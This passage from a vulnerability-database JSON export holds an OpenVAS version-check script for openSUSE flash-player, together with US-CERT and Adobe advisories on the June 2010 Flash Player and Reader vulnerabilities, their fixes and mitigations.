"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "Check for the Version of flash-player", "modified": "2017-12-25T00:00:00", "published": "2010-06-23T00:00:00", "id": "OPENVAS:850133", "href": "http://plugins.openvas.org/nasl.php?oid=850133", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2010:024", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for flash-player SUSE-SA:2010:024\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Flash Player was updated to fix multiple critical security\n vulnerabilities which allow an attacker to remotely execute arbitrary\n code or to cause a denial of service.\n\n The Flash Plugin was upgraded to version 10.1.53.64.\n\n The following CVE numbers have been assigned:\n CVE-2010-2160,\n CVE-2010-2164,\n CVE-2010-2169,\n CVE-2010-2173,\n CVE-2010-2177,\n CVE-2010-2181,\n CVE-2010-2185,\n CVE-2010-2189\n\n The standalone flash player was not yet updated by Adobe and will be\n fixed in a future update.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850133);\n script_version(\"$Revision: 8243 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 07:30:04 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-23 12:17:53 +0200 (Wed, 23 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-024\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-1297\", \"CVE-2010-2160\", \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\", \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\", \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2172\", \"CVE-2010-2173\", \"CVE-2010-2174\", \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\", 
\"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\", \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\", \"CVE-2010-2186\", \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\");\n script_name(\"SuSE Update for flash-player SUSE-SA:2010:024\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.53.64~1.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.53.64~1.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.53.64~1.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-1297"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA10-162A\r\n\r\n\r\nAdobe Flash and AIR Vulnerabilities\r\n\r\n Original release date: June 11, 2010\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Adobe Flash Player 10.0.45.2 and earlier 10.x versions\r\n * Adobe Flash Player 9.0.262 and earlier 9.x versions\r\n * Adobe AIR 1.5.3.9130 and earlier versions\r\n\r\n Other Adobe products that support Flash may also be vulnerable.\r\n\r\n\r\nOverview\r\n\r\n According to Adobe Security Bulletin APSB10-14, there are\r\n vulnerabilities in Adobe Flash and AIR. These vulnerabilities\r\n affect Flash Player, AIR, and possibly other products that support\r\n Flash. A remote attacker could exploit these vulnerabilities to\r\n execute arbitrary code.\r\n\r\n\r\nI. Description\r\n\r\n Adobe Security Bulletin APSB10-14 describes vulnerabilities in\r\n Adobe Flash that affects Flash Player and AIR. It may also affect\r\n other products that independently support Flash, such as Adobe\r\n Reader, Acrobat, Photoshop, Photoshop Lightroom, Freehand MX, and\r\n Fireworks.\r\n\r\n An attacker could exploit these vulnerabilities by convincing a\r\n user to open specially crafted Flash content. Flash content is\r\n commonly hosted on a web page, but it can also be embedded in a PDF\r\n and other documents or provided as a stand-alone file.\r\n\r\n One of these vulnerabilities, CVE-2010-1297, is being exploited\r\n against Flash Player, Adobe Reader, and Acrobat. Additional\r\n information about CVE-2010-1297 is available in US-CERT Technical\r\n Cyber Security Alert TA10-159A and US-CERT Vulnerability Note\r\n VU#486225.\r\n\r\n\r\nII. 
Impact\r\n\r\n If a user opens specially crafted Flash content, a remote attacker\r\n may be able to execute arbitrary code.\r\n\r\n\r\nIII. Solution\r\n\r\n Update Flash and AIR\r\n\r\n Adobe Security Bulletin APSB10-14 recommends updating to Flash\r\n Player 10.1.53.64 or 9.0.277.0 and AIR to 2.0.2.12610. This will\r\n update the Flash web browser plug-in and ActiveX control and AIR,\r\n but will not update Flash support in Adobe Reader, Acrobat, or\r\n other products.\r\n\r\n To reduce your exposure to these and other Flash vulnerabilities,\r\n consider the following mitigation technique.\r\n\r\n Disable Flash in your web browser\r\n\r\n Uninstall Flash or restrict which sites are allowed to run Flash.\r\n To the extent possible, only run trusted Flash content on trusted\r\n domains. For more information, see Securing Your Web Browser.\r\n\r\n\r\nIV. References\r\n\r\n * Adobe Security Bulletin APSB10-14 -\r\n <http://www.adobe.com/support/security/bulletins/apsb10-14.html>\r\n\r\n * Technical Cyber Security Alert TA10-159A -\r\n <http://www.us-cert.gov/cas/techalerts/TA10-159A.html>\r\n\r\n * US-CERT Vulnerability Report VU#486225 -\r\n <http://www.kb.cert.org/vuls/id/486225>\r\n\r\n * Securing Your Web Browser -\r\n <http://www.us-cert.gov/reading_room/securing_browser/>\r\n\r\n * CVE-2010-1297 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297>\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA10-162A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. 
Please send\r\n email to <cert@cert.org> with "TA10-162A Feedback VU#486225" in\r\n the subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2010 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\nRevision History\r\n\r\n June 11, 2010: Initial release\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.5 (GNU/Linux)\r\n\r\niQEVAwUBTBKnQj6pPKYJORa3AQIq+gf/emIaD07wO+6DwdTYMgpYQArprhO5bT+h\r\nkgISYW+OW7Gt4Dq9BkoXgPzgahRRwQZnp0pgjzRst5PsC5+Vn4WCHR8OZBSEoSeo\r\neWL+Y8dqd/IYCPVWjocDbEoeKdDo02hIjRln3dIhvMYIJjO7hffL5OMhle1xW5aJ\r\ny1dYQ4L5oT0OHWN4ZtLnvhMJoqEmpf2Pc2j92JrSNdnesgbGIYNgvcH43vHGQbPp\r\nmA64SkfQCo80CeaSS6dPvnHfRhR8/lPWThoY6Mug4YcpO0Z9SZ7uQ1HftGdMkq67\r\nE4kRZRpnpUGCglte3MVIg5gET3QV0Y8f2uDMv0fmEs38i91aRjJ0fA==\r\n=v/JA\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-06-12T00:00:00", "published": "2010-06-12T00:00:00", "id": "SECURITYVULNS:DOC:24043", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24043", "title": "US-CERT Technical Cyber Security Alert TA10-162A -- Adobe Flash and AIR Vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-1297"], "description": "Security Advisory for Flash Player, Adobe Reader and Acrobat\r\n\r\nRelease date: June 4, 2010\r\n\r\nLast updated: June 10, 2010\r\n\r\nVulnerability identifier: APSA10-01\r\n\r\nCVE number: CVE-2010-1297\r\n\r\nPlatform: All\r\nSummary\r\n\r\nA critical vulnerability exists in Adobe Flash Player 10.0.45.2 
and earlier versions for Windows, Macintosh, Linux and Solaris operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems. This vulnerability (CVE-2010-1297) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat.\r\n\r\nAdobe has released a product update to Adobe Flash Player to resolve the relevant security issue. For more information, please refer to Security Bulletin APSB10-14.\r\n\r\nWe expect to provide an update for Adobe Reader and Acrobat 9.3.2 for Windows, Macintosh and UNIX by June 29, 2010. Please note that the Acrobat and Reader update represents an accelerated release of the next quarterly security update originally scheduled for July 13, 2010. With this accelerated schedule we do not plan to release any new updates for Adobe Reader and Acrobat on July 13, 2010.\r\nAffected software versions\r\n\r\nAdobe Flash Player 10.0.45.2, 9.0.262, and earlier 10.0.x and 9.0.x versions for Windows, Macintosh, Linux and Solaris\r\nAdobe Reader and Acrobat 9.3.2 and earlier 9.x versions for Windows, Macintosh and UNIX\r\n\r\nNote: Adobe Reader and Acrobat 8.x are confirmed not vulnerable.\r\nMitigations\r\n\r\nAdobe Flash Player\r\nAdobe has released a product update to Adobe Flash Player to resolve the relevant security issue. 
For more information, please refer to Security Bulletin APSB10-14.\r\n\r\nAdobe Reader and Acrobat - Windows\r\nDeleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader 9.x and Acrobat 9.x mitigates the threat for those products, but users will experience a non-exploitable crash or error message when opening a PDF file that contains SWF content.\r\n\r\nThe authplay.dll that ships with Adobe Reader 9.x and Acrobat 9.x for Windows is typically located at C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll for Adobe Reader or C:\Program Files\Adobe\Acrobat 9.0\Acrobat\authplay.dll for Acrobat.\r\n\r\nAdobe Reader 9.x - Macintosh\r\n\r\n1) Go to the Applications->Adobe Reader 9 folder.\r\n2) Right Click on Adobe Reader\r\n3) Select Show Package Contents\r\n4) Go to the Contents->Frameworks folder\r\n5) Delete or move the AuthPlayLib.bundle file\r\n\r\nAcrobat Pro 9.x - Macintosh\r\n\r\n1) Go to the Applications->Adobe Acrobat 9 Pro folder.\r\n2) Right Click on Adobe Acrobat Pro\r\n3) Select Show Package Contents\r\n4) Go to the Contents->Frameworks folder\r\n5) Delete or move the AuthPlayLib.bundle file\r\n\r\nAdobe Reader 9.x- UNIX\r\n1) Go to installation location of Reader (typically a folder named Adobe)\r\n2) Within it browse to Reader9/Reader/intellinux/lib/ (for Linux) or Reader9/Reader/intelsolaris/lib/ (for Solaris)\r\n3) Remove the library named "libauthplay.so.0.0.0"\r\nSeverity rating\r\n\r\nAdobe categorizes this as a critical issue.\r\nDetails\r\n\r\nA critical vulnerability exists in Adobe Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems, and the authplay.dll component that ships with Adobe Reader and Acrobat 9.x for Windows, Macintosh and UNIX operating systems. This vulnerability (CVE-2010-1297) could cause a crash and potentially allow an attacker to take control of the affected system. 
There are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat.\r\n\r\nAdobe Reader and Acrobat 8.x are confirmed not vulnerable. Mitigation is available for Adobe Reader and Acrobat 9.x customers as detailed above.\r\n\r\nAdobe actively shares information about this and other vulnerabilities with partners in the security community to enable them to quickly develop detection and quarantine methods to protect users until a patch is available. As always, Adobe recommends that users follow security best practices by keeping their anti-malware software and definitions up to date.\r\n\r\nAdobe has released a product update to Adobe Flash Player to resolve the relevant security issue. For more information, please refer to Security Bulletin APSB10-14.\r\n\r\nWe expect to provide an update for Adobe Reader and Acrobat 9.3.2 for Windows, Macintosh and UNIX by June 29, 2010. Please note that the Acrobat and Reader update represents an accelerated release of the next quarterly security update originally scheduled for July 13, 2010. 
With this accelerated schedule we do not plan to release any new updates for Adobe Reader and Acrobat on July 13, 2010.\r\n\r\nUsers may monitor the latest information on the Adobe Product Security Incident Response Team blog at the following URL: http://blogs.adobe.com/psirt or by subscribing to the RSS feed here: http://blogs.adobe.com/psirt/atom.xml.\r\nRevisions\r\n\r\nJune 10, 2010 - Advisory updated with link to Security Bulletin APSB10-14 that resolves the security issue for Adobe Flash Player.\r\nJune 8, 2010 - Added information to note that the upcoming Adobe Reader and Acrobat update represents the next quarterly security release, originally scheduled for July 13, 2010.\r\nJune 7, 2010 - Update schedule information added, and instructions for Macintosh and UNIX added to 'Mitigations' section.\r\nJune 4, 2010 - Advisory released.\r\n\r\n ", "edition": 1, "modified": "2010-06-11T00:00:00", "published": "2010-06-11T00:00:00", "id": "SECURITYVULNS:DOC:24038", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24038", "title": "Security Advisory for Flash Player, Adobe Reader and Acrobat", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "Multiple vulnerabilities in Flash content parsing.", "edition": 1, "modified": "2010-06-26T00:00:00", 
"published": "2010-06-26T00:00:00", "id": "SECURITYVULNS:VULN:10921", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10921", "title": "Adobe Flash Player / Acrobat / Reader memory corruptions", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "Security update available for Adobe Flash Player\r\n\r\nRelease date: June 10, 2010\r\n\r\nLast updated: June 10, 2010\r\n\r\nVulnerability identifier: APSB10-14\r\n\r\nCVE number: CVE-2008-4546, CVE-2009-3793, CVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, CVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2179, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187, CVE-2010-2188, CVE-2010-2189\r\n\r\nPlatform: All Platforms\r\nSummary\r\n\r\nCritical vulnerabilities have been identified in Adobe Flash Player version 10.0.45.2 and earlier. 
These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nAdobe recommends users of Adobe Flash Player 10.0.45.2 and earlier versions update to Adobe Flash Player 10.1.53.64. Adobe recommends users of Adobe AIR 1.5.3.9130 and earlier versions update to Adobe AIR 2.0.2.12610.\r\nAffected software versions\r\n\r\nAdobe Flash Player 10.0.45.2 and earlier versions for Windows, Macintosh, Linux and Solaris\r\nAdobe AIR 1.5.3.9130 and earlier versions for Windows, Macintosh and Linux\r\n\r\nTo verify the Adobe Flash Player version number installed on your system, access the About Flash Player page, or right-click on content running in Flash Player and select "About Adobe (or Macromedia) Flash Player" from the menu. If you use multiple browsers, perform the check for each browser you have installed on your system.\r\n\r\nTo verify the Adobe AIR version number installed on your system, access the Adobe AIR TechNote for instructions.\r\nSolution\r\n\r\nAdobe Flash Player\r\nAdobe recommends all users of Adobe Flash Player 10.0.45.2 and earlier versions upgrade to the newest version 10.1.53.64 by downloading it from the Adobe Flash Player Download Center or by using the auto-update mechanism within the product when prompted.\r\n\r\nTo address the vulnerabilities described in this Security Bulletin, a prerelease version of Flash Player 10.1 for Solaris platforms is available from Adobe Labs.\r\n\r\nFor users who cannot update to Flash Player 10.1.53.64, Adobe has developed a patched version of Flash Player 9, Flash Player 9.0.277.0, which can be downloaded from the following link.\r\n\r\nAdobe AIR\r\nAdobe recommends all users of Adobe AIR 1.5.3.9130 and earlier versions update to the newest version 2.0.2.12610 by downloading it from the Adobe AIR Download Center.\r\nSeverity rating\r\n\r\nAdobe categorizes this as a critical update and recommends affected users update their installations 
to the newest versions.\r\nDetails\r\n\r\nCritical vulnerabilities have been identified in Adobe Flash Player version 10.0.45.2 and earlier. These vulnerabilities could cause the application to crash and could potentially allow an attacker to take control of the affected system.\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-1297).\r\nNote: There are reports that this issue is being actively exploited in the wild.\r\n\r\nThis update resolves a memory exhaustion vulnerability that could lead to code execution (CVE-2009-3793).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2160).\r\n\r\nThis update resolves an indexing vulnerability that could lead to code execution (CVE-2010-2161).\r\n\r\nThis update resolves a heap corruption vulnerability that could lead to code execution (CVE-2010-2162).\r\n\r\nThis update resolves multiple vulnerabilities that could lead to code execution (CVE-2010-2163).\r\n\r\nThis update resolves a use after free vulnerability that could lead to code execution (CVE-2010-2164).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2165).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2166).\r\n\r\nThis update resolves multiple heap overflow vulnerabilities that could lead to code execution (CVE-2010-2167).\r\n\r\nThis update resolves a pointer memory corruption that could lead to code execution (CVE-2010-2169).\r\n\r\nThis update resolves an integer overflow vulnerability that could lead to code execution (CVE-2010-2170).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2171).\r\n\r\nThis update resolves a denial of service issue on some UNIX platforms (Flash Player 9 only) (CVE-2010-2172).\r\n\r\nThis update resolves an invalid pointer vulnerability that could 
lead to code execution (CVE-2010-2173).\r\n\r\nThis update resolves an invalid pointer vulnerability that could lead to code execution (CVE-2010-2174).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2175).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2176).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2177).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2178).\r\n\r\nThis update resolves a URL parsing vulnerability that could lead to cross-site scripting (Firefox and Chrome browsers only) (CVE-2010-2179).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2180).\r\n\r\nThis update resolves an integer overflow vulnerability that could lead to code execution (CVE-2010-2181).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2182).\r\n\r\nThis update resolves an integer overflow vulnerability that could lead to code execution (CVE-2010-2183).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2184).\r\n\r\nThis update resolves a buffer overflow vulnerability that could lead to code execution (CVE-2010-2185).\r\n\r\nThis update resolves a denial of service vulnerability that can cause the application to crash. Arbitrary code execution has not been demonstrated, but may be possible. 
(CVE-2010-2186).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2187).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2188).\r\n\r\nThis update resolves a memory corruption vulnerability that could lead to code execution (CVE-2010-2189).\r\nNote: This issue occurs only on VMWare systems with VMWare Tools enabled.\r\n\r\nThis update resolves a denial of service issue (CVE-2008-4546).\r\n\r\nAdobe recommends users of Adobe Flash Player 10.0.45.2 and earlier versions update to Adobe Flash Player 10.1.53.64. Adobe recommends users of Adobe AIR 1.5.3.9130 and earlier versions update to Adobe AIR 2.0.2.12610.\r\n\r\nAffected software\r\n\t\r\n\r\nRecommended player update\r\n\t\r\n\r\nAvailability\r\n\r\nFlash Player 10.0.45.2 and earlier\r\n\t\r\n\r\n10.1.53.64\r\n\t\r\n\r\nFlash Player Download Center\r\n\r\nFlash Player 10.0.45.2 and earlier - network distribution\r\n\t\r\n\r\n10.1.53.64\r\n\t\r\n\r\nFlash Player Licensing\r\n\r\nAIR 1.5.3.9130\r\n\t\r\n\r\nAIR 2.0.2.12610\r\n\t\r\n\r\nAIR Download Center\r\n\r\nFlash Professional CS5, Flash CS4 Professional and Flex 4\r\n\t\r\n\r\n10.1.53.64\r\n\t\r\n\r\nFlash Player Support Center\r\n\r\nFlash CS3 Professional and Flex 3\r\n\t\r\n\r\n9.0.277.0\r\n\t\r\n\r\nFlash Player Support Center\r\n\r\n \r\n\r\nNote: The Adobe Flash Player 10.1.53.64 release will be the last version to support Macintosh PowerPC-based G3 computers. Adobe will be discontinuing support of PowerPC-based G3 computers and will no longer provide security updates after the Flash Player 10.1.53.64 release. 
This unavailability is due to performance enhancements that cannot be supported on the older PowerPC architecture.\r\nAcknowledgments\r\n\r\nAdobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers:\r\n\r\n * Will Dormann of CERT (CVE-2010-1297, CVE-2010-2163)\r\n * Lockheed Martin CIRT, Members of the Defense Security Information Exchange (DSIE) (CVE-2010-1297)\r\n * Ralph Loader of Innaworks Development Limited (CVE-2009-3793)\r\n * An Anonymous Researcher and Dionysus Blazakis through TippingPoint's Zero Day Initiative (CVE-2010-2160)\r\n * An Anonymous Researcher reported through iDefense's Vulnerability Contributor Program (CVE-2010-2161)\r\n * Damian Put through TippingPoint's Zero Day Initiative (CVE-2010-2162, CVE-2010-2188)\r\n * An Anonymous Researcher reported through iDefense's Vulnerability Contributor Program (CVE-2010-2164)\r\n * Megumi Yanagishita of Palo Alto Networks Inc. 
(CVE-2010-2165)\r\n * Bing Liu of Fortinet's FortiGuard Labs (CVE-2010-2163, CVE-2010-2166)\r\n * Nicolas Joly of VUPEN Vulnerability Research Team (CVE-2010-2167, CVE-2010-2173, CVE-2010-2174)\r\n * Manuel Caballero and Microsoft Vulnerability Research (MSVR) (CVE-2010-2169)\r\n * Tielei Wang from ICST-ERCIS (Engineering Research Center of Info Security, Institute of Computer Science & Technology, Peking University / China) (CVE-2010-2170)\r\n * An Anonymous Researcher and Tielei Wang, from ICST-ERCIS, Peking University, through TippingPoint's Zero Day Initiative (CVE-2010-2171)\r\n * Report submitted by Red Hat Security Response Team (CVE-2010-2172)\r\n * Bo Qu of Palo Alto Networks (CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178)\r\n * Ezio Anselmo Mazarim Fernandes (CVE-2010-2179)\r\n * Haifei Li of Fortinet's FortiGuard Labs (CVE-2010-2189)\r\n * Tavis Ormandy of the Google Security Team (CVE-2010-2163, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187).\r\n\r\nRevisions\r\n\r\nJune 10, 2010 - Updated Acknowledgments section, adding Lockheed Martin CIRT and Members of the Defense Security Information Exchange.\r\nJune 10, 2010 - Bulletin released.", "edition": 1, "modified": "2010-06-11T00:00:00", "published": "2010-06-11T00:00:00", "id": "SECURITYVULNS:DOC:24039", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24039", "title": "Security update available for Adobe Flash Player", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-0089", "CVE-2010-0088", "CVE-2010-2176", "CVE-2010-0085", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-0087", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-0092", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-0848", "CVE-2010-2165", 
